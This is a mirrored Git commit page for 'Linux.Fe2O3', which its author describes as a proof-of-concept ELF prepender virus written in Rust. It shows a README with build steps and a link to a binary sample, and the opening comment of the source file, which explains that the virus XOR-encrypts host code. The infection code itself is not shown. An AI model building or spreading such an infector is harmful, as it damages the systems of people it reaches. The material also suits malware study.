Mirrors
/
guitmz-Fe2O3
mirror of https://github.com/guitmz/Fe2O3
7
2
Fork 0
Code Issues Releases Wiki Activity

Merge branch 'master' of github.com:guitmz/Fe2O3

This commit is contained in:
Guilherme Thomazi Bonicontro 2019-09-06 17:09:13 +02:00
parent 1c108c66a5 a734f02f40
commit f0ab2454c3
2 changed files with 47 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
README.md
View File

@ -1,2 +1,24 @@
# Fe2O3
Simple prepender virus written in Rust
# Linux.Fe2O3
This is a POC ELF prepender written in Rust. I like writting prependers on languages that I'm learning and find interesting.
# Build
```$ cd src
$ rustc main.rs -o Linux.Fe2O3
```
Note that the Rust version used is `rustc 1.37.0 (eae3437df 2019-08-13)`, the latest at this moment.
# Binary Sample
A binary sample is also available at https://www.guitmz.com/Linux.Fe2O3
```
$ file Linux.Fe2O3
Linux.Fe2O3: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, with debug_info, not stripped
$ sha1sum Linux.Fe2O3
c185ab0fd9b1c8f3ddaed7079898383edbcbb7f7 Linux.Fe2O3
```
# Demo
[![asciicast](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc.png)](https://asciinema.org/a/gMwAoQozAKpX851zXE8DncDSc)

23
src/main.rs
View File

@ -1,3 +1,26 @@
/*
This is a ELF prepender written in Rust by TMZ (2019).
I like writting prependers on languages that I'm learning and find interesting.
Linux.Fe2O3 (September 2019) - Simple binary infector written in Rust.
This version encrypts the host code with a simple XOR and decrypts it at runtime.
It's almost a direct port from my Nim infector Linux.Cephei and Go infector Linux.Liora.
Build with: rustc main.rs -o Linux.Fe2O3
Note that Rust version used was rustc 1.37.0 (eae3437df 2019-08-13).
It has no external dependencies so it should compile under most systems (tested under x86_64).
It's also possible to adapt it to be a PE/Mach infector and compile under Windows/macOS.
Use at your own risk, I'm not responsible for any damages that this may cause.
A big shout for those who keeps the scene alive!
Feel free to email me: thomazi@linux.com || guilherme@guitmz.com
You can also find me at Twitter @TMZvx || @guitmz
https://www.guitmz.com
*/
use std::ffi::{OsStr, OsString};
use std::fs::File;
use std::io::prelude::*;